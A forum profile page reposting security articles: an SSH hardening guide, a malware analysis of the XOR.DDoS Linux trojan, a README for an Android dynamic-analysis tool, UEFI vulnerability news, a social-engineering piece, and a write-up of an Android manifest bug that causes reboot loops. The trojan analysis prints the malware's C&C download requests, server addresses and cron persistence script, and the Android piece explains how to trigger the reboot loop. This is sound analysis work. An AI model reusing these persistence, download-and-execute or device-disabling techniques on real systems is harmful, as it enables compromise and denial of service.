Jump to content

Nytro

Administrators
  • Posts

    18772
  • Joined

  • Last visited

  • Days Won

    729

Everything posted by Nytro

  1. Secure Secure Shell 2015-01-04 crypto, nsa, and ssh You may have heard that the NSA can decrypt SSH at least some of the time. If you have not, then read the latest batch of Snowden documents now. All of it. This post will still be here when you finish. My goal with this post here is to make NSA analysts sad. TL;DR: Scan this post for fixed width fonts, these will be the config file snippets and commands you have to use. Warning: You will need a recent (2013 or so) OpenSSH version. The crypto Reading the documents, I have the feeling that the NSA can 1) decrypt weak crypto and 2) steal keys. Let’s focus on the crypto first. SSH supports different key exchange algorithms, ciphers and message authentication codes. The server and the client choose a set of algorithms supported by both, then proceed with the key exchange. Some of the supported algorithms are not so great and should be disabled completely. If you leave them enabled but prefer secure algorithms, then a man in the middle might downgrade you to bad ones. This hurts interoperability but everyone uses OpenSSH anyway. Key exchange There are basically two ways to do key exchange: Diffie-Hellman and Elliptic Curve Diffie-Hellman. Both provide forward secrecy which the NSA hates because they can’t use passive collection and key recovery later. The server and the client will end up with a shared secret number at the end without a passive eavesdropper learning anything about this number. After we have a shared secret we have to derive a cryptographic key from this using a key derivation function. In case of SSH, this is a hash function. DH works with a multiplicative group of integers modulo a prime. Its security is based on the hardness of the discrete logarithm problem. Alice Bob --------------------------- Sa = random Pa = g^Sa --> Pa Sb = random Pb <-- Pb = g^Sb s = Pb^Sa s = Pa^Sb k = KDF(s) k = KDF(s) ECDH works with elliptic curves over finite fields. Its security is based on the hardness of the elliptic curve discrete logarithm problem. Alice Bob --------------------------- Sa = random Pa = Sa * G --> Pa Sb = random Pb <-- Pb = Sb * G s = Sa * Pb s = Sb * Pa k = KDF(s) k = KDF(s) OpenSSH supports 8 key exchange protocols: curve25519-sha256: ECDH over Curve25519 with SHA2 diffie-hellman-group1-sha1: 1024 bit DH with SHA1 diffie-hellman-group14-sha1: 2048 bit DH with SHA1 diffie-hellman-group-exchange-sha1: Custom DH with SHA1 diffie-hellman-group-exchange-sha256: Custom DH with SHA2 ecdh-sha2-nistp256: ECDH over NIST P-256 with SHA2 ecdh-sha2-nistp384: ECDH over NIST P-384 with SHA2 ecdh-sha2-nistp521: ECDH over NIST P-521 with SHA2 We have to look at 3 things here: ECDH curve choice: This eliminates 6-8 because NIST curves suck. They leak secrets through timing side channels and off-curve inputs. Also, NIST is considered harmful and cannot be trusted. Bit size of the DH modulus: This eliminates 2 because the NSA has supercomputers and possibly unknown attacks. 1024 bits simply don’t offer sufficient security margin. Security of the hash function: This eliminates 2-4 because SHA1 is broken. We don’t have to wait for a second preimage attack that takes 10 minutes on a cellphone to disable it right now. We are left with 1 and 5. 1 is better and it’s perfectly OK to only support that but for interoperability, 5 can be included. Recommended /etc/ssh/sshd_config snippet: KexAlgorithms curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256 Recommended /etc/ssh/ssh_config snippet: Host * KexAlgorithms curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256 If you chose to enable 5, open /etc/ssh/moduli if exists, and delete lines where the 5th column is less than 2000. If it does not exist, create it: ssh-keygen -G /tmp/moduli -b 4096 ssh-keygen -T /etc/ssh/moduli -f /tmp/moduli This will take a while so continue while it’s running. Authentication The key exchange ensures that the server and the client shares a secret no one else knows. We also have to make sure that they share this secret with each other and not an NSA analyst. There are 4 public key algorithms for authentication: DSA ECDSA Ed25519 RSA Number 2 here involves NIST suckage and should be disabled. Unfortunately, DSA keys must be exactly 1024 bits so let’s disable that as well. Protocol 2 HostKey /etc/ssh/ssh_host_ed25519_key HostKey /etc/ssh/ssh_host_rsa_key This will also disable the horribly broken v1 protocol that you should not have enabled in the first place. We should remove the unused keys and only generate a large RSA key and an Ed25519 key. Your init scripts may recreate the unused keys. If you don’t want that, remove any ssh-keygen commands from the init script. cd /etc/ssh rm ssh_host_*key* ssh-keygen -t ed25519 -f ssh_host_ed25519_key < /dev/null ssh-keygen -t rsa -b 4096 -f ssh_host_rsa_key < /dev/null Generate client keys using the following commands: ssh-keygen -t ed25519 ssh-keygen -t rsa -b 4096 Symmetric ciphers Symmetric ciphers are used to encrypt the data after the initial key exchange and authentication is complete. Here we have quite a few algorithms: 3des-cbc aes128-cbc aes192-cbc aes256-cbc aes128-ctr aes192-ctr aes256-ctr aes128-gcm aes256-gcm arcfour arcfour128 arcfour256 blowfish-cbc cast128-cbc chacha20-poly1305 We have to consider the following: Security of the cipher algorithm: This eliminates 1 and 10-12 - both DES and RC4 are broken. Again, no need to wait for them to become even weaker, disable them now. Key size: At least 128 bits, the more the better. Block size: Does not apply to stream ciphers. At least 128 bits. This elminates 14 because CAST has a 64 bit block size. Cipher mode: The recommended approach here is to prefer AE modes and optionally allow CTR for compatibility. CTR with Encrypt-then-MAC is provably secure. This leaves 5-9 and 15. Chacha20-poly1305 is preferred over AES-GCM because the latter does not encrypt message sizes. Recommended /etc/ssh/sshd_config snippet: Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr Recommended /etc/ssh/ssh_config snippet: Host * Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr Message authentication codes Encryption provides confidentiality, message authentication code provides integrity. We need both. If an AE cipher mode is selected, then extra MACs are not used, the integrity is already given. If CTR is selected, then we need a MAC to calculate and attach a tag to every message. There are multiple ways to combine ciphers and MACs - not all of these are useful. The 3 most common: Encrypt-then-MAC: encrypt the message, then attach the MAC of the ciphertext. MAC-then-encrypt: attach the MAC of the plaintext, then encrypt everything. Encrypt-and-MAC: encrypt the message, then attach the MAC of the plaintext. Only Encrypt-then-MAC should be used, period. Using MAC-then-encrypt have lead to many attacks on TLS while Encrypt-and-MAC have lead to not quite that many attacks on SSH. The reason for this is that the more you fiddle with an attacker provided message, the more chance the attacker has to gain information through side channels. In case of Encrypt-then-MAC, the MAC is verified and if incorrect, discarded. Boom, one step, no timing channels. In case of MAC-then-encrypt, first the attacker provided message has to be decrypted and only then can you verify it. Decryption failure (due to invalid CBC padding for example) may take less time than verification failure. Encrypt-and-MAC also has to be decrypted first, leading to the same kind of potential side channels. It’s even worse because no one said that a MAC’s output can’t leak what its input was. SSH by default, uses this method. Here are the available MAC choices: hmac-md5 hmac-md5-96 hmac-ripemd160 hmac-sha1 hmac-sha1-96 hmac-sha2-256 hmac-sha2-512 umac-64 umac-128 hmac-md5-etm hmac-md5-96-etm hmac-ripemd160-etm hmac-sha1-etm hmac-sha1-96-etm hmac-sha2-256-etm hmac-sha2-512-etm umac-64-etm umac-128-etm The selection considerations: Security of the hash algorithm: No MD5 and SHA1. Yes, I know that HMAC-SHA1 does not need collision resistance but why wait? Disable weak crypto today. Encrypt-then-MAC only: This eliminates the first half, the ones without -etm. You may be forced to enable non-etm algorithms on for some hosts (github). I am not aware of a security proof for CTR-and-HMAC but I also don’t think CTR decryption can fail. Tag size: At least 128 bits. This eliminates umac-64-etm. Key size: At least 128 bits. This doesn’t eliminate anything at this point. Recommended /etc/ssh/sshd_config snippet: MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-ripemd160-etm@openssh.com,umac-128-etm@openssh.com Recommended /etc/ssh/ssh_config snippet: # Github supports neither AE nor Encrypt-then-MAC. Host github.com MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-ripemd160-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,hmac-ripemd160,umac-128 Host * MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-ripemd160-etm@openssh.com,umac-128-etm@openssh.com Preventing key theft Even with forward secrecy the secret keys must be kept secret. The NSA has a database of stolen keys - you do not want your key there. System hardening This post is not intended to be a comprehensive system security guide. Very briefly: Don’t install what you don’t need: Every single line of code has a chance of containing a bug. Some of these bugs are security holes. Fewer lines, fewer holes. Use free software: As in speech. You want to use code that’s actually reviewed or that you can review yourself. There is no way to achieve that without source code. Someone may have reviewed proprietary crap but who knows. Keep your software up to date: New versions often fix critical security holes. Exploit mitigation: Sad but true - there will always be security holes in your software. There are things you can do to prevent their exploitation such GCC’s -fstack-protector. One of the best security projects out there is Grsecurity. Use it or use OpenBSD. Traffic analysis resistance Set up Tor hidden services for your SSH servers. This has multiple advantages. It provides an additional layer of encryption and server authentication. People looking at your traffic will not know your IP, so they will be unable to scan and target other services running on the same server and client. Attackers can still attack these services but don’t know if it has anything to do with the observed traffic until they actually break in. Now this is only true if you don’t disclose your SSH server’s fingerprint in any other way. You should only accept connections from the hidden service or from LAN, if required. If you don’t need LAN access, you can add the following line to /etc/ssh/sshd_config: ListenAddress 127.0.0.1:22 Add this to /etc/tor/torrc: HiddenServiceDir /var/lib/tor/hidden_service/ssh HiddenServicePort 22 127.0.0.1:22 You will find the hostname you have to use in /var/lib/tor/hidden_service/ssh/hostname. You also have to configure the client to use Tor. For this, socat will be needed. Add the following line to /etc/ssh/ssh_config: Host *.onion ProxyCommand socat - SOCKS4A:localhost:%h:%p,socksport=9050 Host * ... If you want to allow connections from LAN, don’t use the ListenAddress line, configure your firewall instead. Key storage You should encrypt your client key files using a strong password. Additionally, you can use ssh-keygen -a $number to slow down cracking attempts by iterating the hash function many times. You may want to store them on a pendrive and only plug it in when you want to use SSH. Are you more likely to lose your pendrive or have your system compromised? I don’t know. Unfortunately, you can’t encrypt your server key and it must be always available, or else sshd won’t start. The only thing protecting it is OS access controls. The end It’s probably a good idea to test the changes. ssh -v will print the selected algorithms and also makes problems easier to spot. Be extremely careful when configuring SSH on a remote host. Always keep an active session, never restart sshd. Instead you can send the SIGHUP signal to reload the configuration without killing your session. You can be even more careful by starting a new sshd instance on a different port and testing that. Can you make these changes? If the answer is yes, then… If the answer is no, it’s probably due to compatibility problems. You can try to convince the other side to upgrade their security and turn it into a yes. If you work for a big company and change management doesn’t let you do it, I’m sorry. I’ve seen the v1 protocol enabled in such places. There is no chance of improvement. Give up to preseve your sanity. Special thanks to the people of Twitter for the improvements: @ae_g_i_s @AkiTuomi @cryptomilk @eckes @goulaschcowboy @ioerror @jedisct1 @mathandemotion @ThomasJWaldmann @TimelessP Sursa: https://stribika.github.io/2015/01/04/secure-secure-shell.html
  2. Linux DDoS Trojan hiding itself with an embedded rootkit Peter Kálnai January 6th, 2015 At the end of September 2014, a new threat for the Linux operating system dubbed XOR.DDoS forming a botnet for distributed denial-of-service attacks was reported by the MalwareMustDie! group. The post mentioned the initial intrusion of SSH connection, static properties of related Linux executable and encryption methods used. Later, we realized that the installation process is customized to a victim’s Linux environment for the sake of running an additional rootkit component. In this blog post, we will describe the installation steps, the rootkit itself, and the communication protocol for getting attack commands. Installation Script & Infection Vector The infection starts by an attempt to brute force SSH login credentials of the root user. If successful, attackers gain access to the compromised machine, then install the Trojan usually via a shell script. The script contains procedures like main, check, compiler, uncompress, setup, generate, upload, checkbuild, etc. and variables like __host_32__, __host_64__, __kernel__, __remote__, etc. The main procedure decrypts and selects the C&C server based on the architecture of the system. In the requests below, iid parameter is the MD5 hash of the name of the kernel version. The script first lists all the modules running on the current system by the command lsmod. Then it takes the last one and extracts its name and the parameter vermagic. In one of our cases, the testing environment runs under “3.8.0-19-generic\ SMP\ mod_unload\ modversions\ 686\ “, which has the MD5 hash equal to CE74BF62ACFE944B2167248DD0674977. Three GET requests are issued to C&C. The first one is performed by the check procedure (note the original misspelling): [TABLE] [TR] [TD]request: GET /check?iid=CE74BF62ACFE944B2167248DD0674977&kernel=3.8.0reply: 1001|CE74BF62ACFE944B2167248DD0674977|header directory is exists![/TD] [/TR] [/TABLE] Then compiler procedure issues another GET request in which parameters like C&C servers, version info, etc, are passed to the server where they are compiled into a newly created executable: [TABLE] [TR] [TD]request: GET /compiler?iid=CE74BF62ACFE944B2167248DD0674977&username=admin &password=admin&ip=103.25.9.245:8005%7C103.240.141.50:8005%7C 66.102.253.30:8005%7Cndns.dsaj2a1.org:8005%7Cndns.dsaj2a.org:8005%7C ndns.hcxiaoao.com:8005%7Cndns.dsaj2a.com:8005 &ver=3.8.0-19-generic%5C%20SMP%5C%20mod_unload%5C%20modversions%5C%20686%5C%20 &kernel=3.8.0 reply: 1001|CE74BF62ACFE944B2167248DD0674977|header directory is exists![/TD] [/TR] [/TABLE] Finally, the third GET request downloads the customized version of the Trojan’s binary in the form of a gzip archive, which is unpacked and executed: [TABLE] [TR] [TD]request: GET /upload/module/CE74BF62ACFE944B2167248DD0674977/build.tgz reply: 1001|CE74BF62ACFE944B2167248DD0674977|create ok[/TD] [/TR] [/TABLE] The previous steps run only in the case that there already is a built version for the current kernel version on the server side. If not, the script locates the kernel headers in /lib/modules/%s/build/ directory, where %s means the return value after calling the command uname with parameter r, then packs all files and uploads them to the C&C server using a custom uploader called mini. The steps of the first scenario follows. The rootkit component is a loadable kernel module (LKM). To install it successfully on a system, the vermagic value of LKM needs to agree with the version of the kernel headers installed on the user’s system. That’s the motivation behind previous installation steps. If previous sequences fail, the script installs a Trojan omitting the rootkit component. Structure & Persistence The binary structure of the main executable is as follows: The persistence of the Trojan is achieved in multiple ways. First, it is installed into the /boot/ directory with a random 10-character string. Then a script with the identical name as the Trojan is created in the /etc/init.d directory. It is together with five symbolic links pointing to the script created in /etc/rc%u.d/S90%s, where %u runs from 1 to 5 and %s is substitute with the random. Moreover, a script /etc/cron.hourly/cron.sh is added with the content: [TABLE] [TR] [TD]#!/bin/sh PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin’ for i in `cat /proc/net/dev|grep :|awk -F: {‘,27h,’print $1?,27h,’}`; do ifconfig $i up& done cp /lib/udev/udev /lib/udev/debug /lib/udev/debug[/TD] [/TR] [/TABLE] The line “*/3 * * * * root /etc/cron.hourly/cron.sh” is inserted in the crontab. The functionality of the main executable lies in three infinite loops responsible for 1. downloading and executing instructions in a bot’s configuration file, 2. reinstalling itself as the /lib/udev/udev file, and 3. performing flooding commands. The configuration file contains four categories of lists: md5, denyip, filename and rmfile and mean killing a running process based on its CRC checksum, on the active communication with an IP from the list, on a filename, and finally removing a file with a specified name. In the next figure, a fragment of the config file is displayed (known filenames connected with competing flooding Trojans are highlighted): The lists of processes to kill or remove before its own installation is typical for flooding Trojans. Also we have to note that there is a variant of this Trojan compiled for the ARM architecture. This suggests that the list of potentially infected systems (besides 32-bit and 64-bit Linux web servers and desktops) is extended for routers, Internet of Things devices, NAS storages or 32-bit ARM servers (however, it has not been observed in the wild yet). It contains an additional implementation of the download-and-execute feature in an infinite loop called daemondown: A few days ago, a new 32-bit variant of this Trojan with few modifications was observed. The bot is installed as /lib/libgcc4.so file, the unique file containing its identification string (see later) was /var/run/udev.pid, the initialization script was /etc/cron.hourly/udev.sh and the rootkit features were completely omitted. The presence of all these files could serve as an indicator of compromise (IoC). LKM Rootkit Trojans for the Windows platform have used various rootkit features for a very long time. It is known that some trojanized flooding tools had the Windows variant utilizing the Agony rootkit (its source code has been publicly shared and available since 2006). We presented research related to these malicious DDoS tools at Botconf 2014 in a survey called Chinese Chicken: Multiplatform-DDoS-Botnets. Now there is a flooding Trojan for Linux that also contains an embedded rootkit. It’s main functionality is to hide various aspects of the Trojan’s activity and is provided by procedures in the switch table: The Trojan running in the userspace requests these features from the rootkit in the kernel by ioctl command with a specific code (0×9748712). The presence of the rootkit is first checked by opening a process with the name rs_dev: The own request needs two parameters: One specifies the number of the command to be performed by the rootkit, and the other one is the number of the port to be hidden. Below is an example of how the Trojan hides the TCP port (notice the task value 3): Based on the procedure names, it is likely that the malware authors were inspired by the open source project called Suterusu to build up their rootkit. The Trojan from last year called Hand of Thief failed in its ambitions to be the first banking Trojan for Linux desktops. It also borrowed part of its code from an existing open source project, namely methods of process injection. The description of the project says “An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM”. Another article related to Suterusu was published in January 2013. C&C communication The communication is encrypted in both directions with the same hard-coded XOR key (BB2FA36AAA9541F0) as the configuration file. An additional file /var/run/sftp.pid containing an unique magic string of length 32 bytes is stored and utilized as an unique identifier of a victim’s machine within the communication. There is a list of C&C commands, for which the bot listens to: To start flooding, to stop flooding, to download-and-execute, to self-update, to send the MD5 hash of its memory, and to get list of processes to kill: The list of C&Cs is stored in the shell script in the __remote__ variable. The Trojan first sends information about the running system to the C&C server (very likely to be displayed on a panel of a botnet operator). The replies usually arrived in a form of a command. The header of the command is 0x1C bytes long and is stored within a structure called Header. The first command is to stop any flooding attack and the next one to start one with the list of hosts provided. The entries of the Header are shown below. Highlighted parameters are the size of the total size of a command (Size, 0x102C), the task number (Order, 0×3, i.e. _cmd_start in the switch table), and the number of flooding tasks (Task_Num, 0xF): The rest of the flooding command contains an encrypted structure with attack tasks. After decryption, we can see an IP address (red color) and ports (green color) which will be flooded by the Trojan and other parameters of the DDoS attack (e.g. grey color decides the type of attack: SYN/DNS). Acknowledgement Thanks to my colleague, Jaromír Ho?ejší, for cooperation on this analysis. Pop-art was created by the independent digital artist Veronika Begánová. Sources Here are the samples connected with the analysis: [TABLE] [TR] [TD]Install script[/TD] [TD]BA84C056FB4541FE26CB0E10BC6A075585 990F3CE3CDE2B49475022AD5254E5B[/TD] [TD=width: 160]BV:Xorddos-B [Trj][/TD] [/TR] [TR] [TD=width: 109]Xorddos Uploader[/TD] [TD=width: 231]44153031700A019E8F9E434107E4706A705 F032898D3A9819C4909B2AF634F18 [/TD] [TD=width: 160]ELF:Xorddos-J [Trj][/TD] [/TR] [TR] [TD=width: 109]Xorddos Trojan for EM_386[/TD] [TD=width: 231]AD26ABC8CD8770CA4ECC7ED20F37B510E 827E7521733ECAEB3981BF2E4A96FBF[/TD] [TD=width: 160]ELF:Xorddos-A [Trj][/TD] [/TR] [TR] [TD=width: 109]Xorddos Trojan for EM_x86_64[/TD] [TD=width: 231]859A952FF05806C9E0652A9BA18D521E57 090D4E3ED3BEF07442E42CA1DF04B6 [/TD] [TD=width: 160]ELF:Xorddos-A [Trj][/TD] [/TR] [TR] [TD=width: 109]Xorddos Rootkit[/TD] [TD=width: 231]6BE322CD81EBC60CFEEAC2896B26EF015D 975AD3DDA95AE63C4C7A28B7809029 [/TD] [TD=width: 160]ELF:Xorddos-D [Rtk][/TD] [/TR] [TR] [TD=width: 109]Xorddos Trojan for EM_ARM[/TD] [TD=width: 231]49963D925701FE5C7797A728A044F09562 CA19EDD157733BC10A6EFD43356EA0 [/TD] [TD=width: 160]ELF:Xorddos-I [Trj][/TD] [/TR] [TR] [TD=width: 109]Xorddos Trojan no rootkit[/TD] [TD=width: 231]24B9DB26B4335FC7D8A230F04F49F87B1F 20D1E60C2FE6A12C70070BF8427AFF [/TD] [TD=width: 160]ELF:Xorddos-K [Trj][/TD] [/TR] [/TABLE] Sursa: https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/
  3. Hooker: Automated Dynamic Analysis of Android Applications About Hooker Functional Description Hooker is an opensource project for dynamic analyses of Android applications. This project provides various tools and applications that can be use to automaticaly intercept and modify any API calls made by a targeted application. It leverages Android Substrate framework to intercept these calls and aggregate all their contextual information (parameters, returned values, ...). Collected information can either be stored in a distributed database (e.g. ElasticSearch) or in json files. A set of python scripts is also provided to automatize the execution of an analysis to collect any API calls made by a set of applications. Technical Description Hooker is made of multiple modules: APK-instrumenter is an Android application that must be installed prior to the analysis on an Android device (for instance, an emulator). hooker_xp is a python tool that can be use to control the android device and trigger the installation and stimulation of an application on it. hooker_analysis is a python script that can be use to collect results stored in the elasticsearch database. tools/APK-contactGenerator is an Android application that is automatically installed on the Android device by hooker_xp to inject fake contact informations. tools/apk_retriever is a Python tool that can be use to download APKs from various online public Android markets. tools/emulatorCreator is a script that can be use to prepare an emulator. You'll have to edit this script in order to specify your SDK home and stuff. More Information Website: https://github.com/AndroidHooker/hooker FAQ is available here Bug Tracker: Bug and feature requests are organized in GitHub Issues Email: android-hooker@amossys.fr Twitter: Follow authors account (@Tibapbedoum and @Lapeluche) Getting Started We developped Hooker using our Debian 64-bits computers and as so, it may fail to execute properly on other systems due to improper paths or parameters. Your help to identify those incompatibilities is highly appreciated. Please report an issue in our Bug Tracker if you meet any error while using it. In order to use Hooker you need at least one server on which you've installed: python 2.7, elasticsearch 1.1.1, android SDK API16 (Android 4.1.2), androguard 1.9. Setup your ElasticSearch Host This step is related the elastic search installation. Please download and follow elasticsearch online documentation: Elasticsearch.org Download ELK | Elasticsearch. You can either install the elasticsearch on a single host or deploy a cluster of elasticsearch nodes. Setup Android SDK You can download Android bundle here: Download Android Studio and SDK Tools | Android Developers. If you want to use the Hooker install script, you have to: Make sure to set your ANDROID_HOME environment variable: $ export ANDROID_HOME=/path/to/your/sdk/folder Download SDK APIs from your SDK manager (Hooker has been tested with API 16, but should work with more recent versions). Build your reference Android Virtual Device (AVD) Create a new AVD from scratch. If you want to fit our experience, please choose the following parameters: Nexus One, Target: Android 4.1.2, Memory option: 512 Mb, Internal Storage: 500 Mb, SDCard: 500 Mb (you must have an SDcard storage if you want Hooker to work properly), Enable snapshot, [*]Launch your new AVD with: Save to snapshot, [*]Run script tools/emulatorCreator/prepareEmulator.sh to install and prepare your emulator, [*]In your android system: disable the lockscreen security: Menu > System Settings > Security > Screen lock > None, open superuser app, validate Okay and quit, open substrate app, click Link Substrate Files, allow substrate, and reclick on Link substrate Files. Then click Restart System (Soft), [*]Wait for system to start properly and close the emulator, [*]Your reference AVD is now ready! Configure the host where Hooker is executed If your elasticsearch host is on a different host than your android emulator, you will need to redirect traffic throw network. In order to do this, you can use socat: $ socat -s -v TCP4-LISTEN:9200,fork,ignoreeof,reuseaddr TCP4:192.168.98.11:9200,ignoreeof If you have an error concerning OpenGLES emulation (Could not load OpenGLES emulation library), you have to edit your ldconfig (as root): # echo "/path/to/your/sdk/tools/lib" > /etc/ld.so.conf.d/android.conf # ldconfig Play HOOKER Playing with real devices If you want to use Hooker on real devices, please read first the specific README. Installation An install script is provided to help you build and install all necessary dependances. If you want to use this script, make sure you have the following dependances: # openjdk-6-jdk, ant, python-setuptools (just apt install them) When you are all set, run install script in the Hooker root directory: $ ./install.sh You then need to install application APK-instrumenter on your reference AVD: Launch your new AVD with: Save to snapshot option checked, Install the application using adb $ $ANDROID_HOME/platform-tools/adb install APK-instrumenter/bin/ApkInstrumenterActivity-debug.apk When the application is installed, open substrate app and click Restart System (Soft). You can then close your AVD. Setup your configuration file If you want to make a manual analysis, copy file hooker_xp/sampleManualAnalysis.conf, If you want to make an automatic analysis, copy file hooker_xp/sampleAutomaticAnalysis.conf, If you want to make an analysis on real devices, copy one of the *RealDevice* configuration files, Depending on your system configuration, customize the different parameters declared in retained configuration file. Sample configuration files are verbose++, so please read comments, In relation with previous steps, you need to specify the path to your reference AVD you just built. As the comments explain it, just put the path + name of AVD, i.e. without the .avd extension. Run your Experiment Python experiment script is in hooker_xp directory: $ cd hooker_xp && python hooker_xp.py -c yourAnalysisConfigurationFile.conf You should have python logs explaining you what is going on. Contributing We would be delighted if you could help us improve this work. Please use github features to provide your bugfixes and improvements. Authors and Sponsors The Hooker project has been initiated by Georges Bossert and Dimitri Kirchner. Both work for AMOSSYS, a French IT security company http://www.amossys.fr. License This software is licensed under the GPLv3 License. See the LICENSE file in the top distribution directory for the full license text. Sursa: https://github.com/AndroidHooker/hooker
  4. Researchers Find Several UEFI Vulnerabilities By Eduard Kovacs on January 06, 2015 The Carnegie Mellon University CERT Coordination Center warned on Monday that serious vulnerabilities exist in the Unified Extensible Firmware Interface (UEFI), the BIOS replacement designed for improved software interoperability. The organization has published three separate advisories for security holes identified by researchers Rafal Wojtczuk of Bromium and Corey Kallenberg of The MITRE Corporation. The experts disclosed the UEFI vulnerabilities in a presentation at the Chaos Communication Congress (CCC) in Germany in late December. The first flaw identified by the experts, CVE-2014-8274, can be exploited by a local, authenticated attacker to bypass firmware write protections. According to the researchers, the issue exists because access to the boot script used by the EFI S3 Resume Boot Path is not properly restricted. “An authenticated local attacker may be able to bypass Secure Boot and/or perform an arbitrary reflash of the platform firmware despite the presence of signed firmware update enforcement. Additionally, the attacker could arbitrarily read or write to the SMRAM region. Lastly, the attacker could corrupt the platform firmware and cause the system to become inoperable,” CERT/CC noted in its advisory. The second vulnerability, CVE-2014-8273, is a race condition affecting certain Intel chipsets and it can be exploited by a local, authenticated attacker to bypass the BIOS write protection mechanism and write malicious code to the platform firmware. Another security hole disclosed by Wojtczuk and Kallenberg is a buffer overflow vulnerability (CVE-2014-8274) in the EDK1 UEFI reference implementation. “The impact of the vulnerability depends on the earliness at which the vulnerable code can be instantiated. Generally, as the boot up of the platform progresses, the platform becomes more and more locked down. Specifically, things like the SPI Flash containing the platform firmware, [system Management Mode (SMM)], and other chipset configurations become locked,” explained Wojtczuk and Kallenberg. “In an ideal (for attacker) scenario, the vulnerable code can be instantiated before the SPI flash is locked down, thus resulting in an arbitrary reflash of the platform firmware.” The advisories published by CERT/CC show that potentially affected vendors were notified in September and October. Some of these organizations have determined if their products are affected, but the status for many of them is currently “unknown.” CVE-2014-8271 has been confirmed to impact Insyde Software products. UEFI firmware from American Megatrends Incorporated (AMI) and Phoenix Technologies is affected by CVE-2014-8273. CVE-2014-8274 has been confirmed to affect AMI, Phoenix and Intel solutions, but Dell is also on the list of possibly impacted vendors. In a separate presentation at CCC, Trammell Hudson demonstrated how an attacker can make malicious modifications to the firmware of Apple MacBooks. Sursa: Researchers Find Several UEFI Vulnerabilities | SecurityWeek.Com
  5. Social Engineering: The dangers of positive thinking The assumption that everything's okay is a risky one By Steve Ragan CSO | Jan 5, 2015 7:00 AM PT CSO Online recently spoke to a person working in the security field with a rather unique job. He's paid to break into places, such as banks and research facilities (both private and government), in order to test their resistance to social engineering and physical attacks. Rarely is he caught, but even when he is it doesn't matter, and the reason for his success is the same in each case – human nature. Caught on film: When the surveillance video starts playing, the images show a typical day at a bank somewhere in the world. Business is steady, but the lobby isn't overly packed with customers, so a single teller is working the window. [Four of the newest (and lowest) social engineering scams]Soon, the bank supervisor walks to the left in greeting. At thirty-five seconds in, Jayson Street, the Infosec Ranger at Pwnie Express, a company that specializes in creating unique hacking tools for professionals, makes his first appearance. Dressed in jeans, a DEF CON jacket and red ThunderCat high-tops, Street is taking a casual stroll behind the counter. Not only is he in the bank, he's in an area that's supposed to be secure and limited only to authorized personnel. Given the location of the bank, somewhere outside of the United States, Street is clearly not a local or a customer. He's there to perform a penetration test; in this case he's testing both physical security as well as network security, but the staff don't know this. A few seconds later, the supervisor is on screen pointing to a computer that's currently being used by an employee. Street nods his head in agreement, and moments later he's granted physical access to the system. He's plugging a USB drive into the computer's front port and running software, which requires the employee to stop working with a customer and relinquish his seat for a moment. Articol complet: Social Engineering: The dangers of positive thinking | CSO Online
  6. Malformed AndroidManifest.xml in Apps Can Crash Mobile Devices 1:57 am (UTC-7) | by Simon Huang (Mobile Security Engineer) Every Android app comprises of several components, including something called the AndroidManifest.xml file or the manifest file. This manifest file contains essential information for apps, “information the system must have before it can run any of the app’s code.” We came across a vulnerability related to the manifest file that may cause an affected device to experience a continuous cycle of rebooting—rendering the device nearly useless to the user. The Manifest File Vulnerability The vulnerability can cause the OS to crash through two different ways. The first involves very long strings and memory allocation. Some apps may contain huge strings in their .XML files, using document type definition (DTD) technology. When this string reference is assigned to some of the tags in AndroidManifest.xml (e.g., permission name, label, name of activity), the Package Parser will require memory to parse this .XML file. However, when it requires more memory than is available, the PackageParser will crash. This triggers a chain reaction wherein all the running services stops and the whole system consequently reboots once. The second way involves .APK files and a specific intent-filter, which declares what a service or activity can do. An icon will be created in the launcher if the manifest file contains an activity definition with this specific intent-filter: <intent-filter> <action android:name="android.intent.action.MAIN"/> <category android:name="android.intent.category.LAUNCHER"/> </intent-filter> If there are many activities defined with this intent-filter, the same number of icons will be created in the home page after installation. However, if this number is too large, the .APK file will trigger a loop of rebooting. If the number of activities is bigger than 10,000: For Android OS version 4.4, the launcher process will undergo the reboot. For version L, the PackageParser crashes and reboots. The malformed .APK will be installed by no icon will be displayed. If the number of activities is larger than 100,000, the devices will undergo the loop of rebooting. Testing the Vulnerability, Part 1 We created an .APK file with a manifest file containing a huge string reference, as seen in Figure 1. During installation, the device reboots, seen in the logcat information in Figure 2. Figure 1. AndroidManifest with DTD huge string reference The OS crashes and reboots during installation We have tested and proven that this created APK could crash both Android OS 4.4.4, Android OS L, and older versions of the platform. Testing the Vulnerability, Part 2 We also created an application with the manifest file as shown in Figure 3, which can make Android devices undergo a loop of reboots. After installation, the device was unresponsive, save for the rebooting. A user will not even be able to uninstall the APK or switch off the device. It will simply reboot until the device runs out of the power. The only solution is to flash the ROM or install the platform again. Figure 3. AndroidManifest.xml with 100,000 icons Knowing the Risks While this vulnerability isn’t a technically a security risk, it does put devices at risk in terms of functionality. This vulnerability can essentially leave devices useless. Affected devices can be “rescued” but only if the Android Debug Bridge (ADB) is activated or enabled. The only solution would be to connect the device to a computer, boot the phone in fastboot mode, and flash the ROM. Unfortunately, such actions can only be done by highly technical users as a mistake can possibly brick a device. For this issue, we recommend that users contact customer service (if their devices are still under warranty) or a reputable repair shop. We have notified Google about this issue. Sursa: Malformed AndroidManifest.xml in Apps Can Crash Mobile Devices | Security Intelligence Blog | Trend Micro
  7. Nytro

    pyxswf

